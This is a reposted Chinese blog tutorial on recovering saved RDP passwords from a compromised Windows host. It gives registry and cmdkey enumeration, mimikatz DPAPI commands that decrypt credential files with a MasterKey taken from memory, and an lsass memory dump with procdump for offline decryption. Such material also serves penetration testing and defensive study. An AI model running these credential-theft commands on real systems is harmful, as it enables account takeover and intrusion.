1. Johngo学长首页
  2. 技术点详细复盘专题
  3. Python

获取rdp保存的凭证

Python 阅读 55

获取用户保存的rdp凭证

当获取到一台windows服务器,可以尝试获取本地远程连接的信息,如果用户在登入rdp时勾选了 允许为我保存凭证的选项,则在该用户本地会生成一个凭证文件,我们只需要破解该凭证文件即可获取其明文密码。

获取rdp保存的凭证

通过注册表 查看 注册表信息,获取rdp的计算机用户名,ip信息

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

/s
查询所有子项和值

获取rdp保存的凭证

通过对任务栏中rdp图标右键 也可查看到历史连接过哪些主机

获取rdp保存的凭证

通过 cmdkey 查看历史连接记录

查看mstsc的连接纪录
cmdkey /list

获取rdp保存的凭证

远程解密

查找本地的Credentials

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

/a
显示受系统保护的操作系统文件

%userprofile%=C:\Users\Administrator
当前用户文件

获取rdp保存的凭证

记录下

70BFA8D6A8521AC99A3EA6E20E7ECBA2

获取该文件的MasterKey的guid

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\70BFA8D6A8521AC99A3EA6E20E7ECBA2"

获取rdp保存的凭证

记录下guid

381ad929-2b95-44dc-bfa2-5e29a0fc26df

用于加密凭据文件70BFA8D6A8521AC99A3EA6E20E7ECBA2的MasterKey的guid就是:{381ad929-2b95-44dc-bfa2-5e29a0fc26df},接下来我们只要从内存中找到这个guid对应的MasterKey的值即可

通过guid获取对应的MasterKey值

mimikatz "privilege::debug" "sekurlsa::dpapi"

获取rdp保存的凭证

记录下MasterKey

17c885090cfe161c8a8ee51cf75751fae082aa118d3a7b4b1de5d73728097136bf513871bad37cd7c7fa87045d738e9d34115ba2074b9d65de09151463451609

最后打开mimikatz通过MasterKey值去解密凭据文件:

dpapi::cred /in:凭据文件路径 /masterky::masterky值

dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\70BFA8D6A8521AC99A3EA6E20E7ECBA2 /masterky:17c885090cfe161c8a8ee51cf75751fae082aa118d3a7b4b1de5d73728097136bf513871bad37cd7c7fa87045d738e9d34115ba2074b9d65de09151463451609

获取rdp保存的凭证

离线解密

条件:

目标的文件

当前用户内存中的凭证

dump目标lsass内存

procdump64.exe -accepteula -ma lsass.exe lsass1.dump

用mimikatz载入dump回来的内存

privilege::debug
sekurlsa::minidump lsass1.dmp

获取rdp保存的凭证

到了这一步,后面的就和在线获取差不多了。

我们可以输入dpapi::cred /in:70BFA8D6A8521AC99A3EA6E20E7ECBA2来获取GUID(这里由于我把Credentials文件放在mimikatz同目录下,所以我用的相对路径)

获取Credentials的GUID:

dpapi::cred /in:70BFA8D6A8521AC99A3EA6E20E7ECBA2

Guid:381ad929-2b95-44dc-bfa2-5e29a0fc26df

获取rdp保存的凭证

获取内存中所有的MasterKey,并通过GUID对比得出想要的那一个:

sekurlsa::dpapi

MasterKey
17c885090cfe161c8a8ee51cf75751fae082aa118d3a7b4b1de5d73728097136bf513871bad37cd7c7fa87045d738e9d34115ba2074b9d65de09151463451609

获取rdp保存的凭证

利用MasterKey解密

dpapi::cred /in:70BFA8D6A8521AC99A3EA6E20E7ECBA2 /masterkey:17c885090cfe161c8a8ee51cf75751fae082aa118d3a7b4b1de5d73728097136bf513871bad37cd7c7fa87045d738e9d34115ba2074b9d65de09151463451609

获取rdp保存的凭证

Original: https://blog.csdn.net/weixin_44747030/article/details/128401376
Author: 9z1nc
Title: 获取rdp保存的凭证

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/794251/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)
0

【自取】最近整理的,有需要可以领取学习:



Linux核心资料大放送~

全栈面试题汇总(持续更新&可下载)

一个提高学习100%效率的工具!

【超详细】深度学习面试题目!

LeetCode Python刷题答案下载!

LeetCode Java版刷题答案下载!

LeetCode C++ 版本,抓紧保存!

LeetCode GO语言 刷题答案下载!

大家都在看

亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球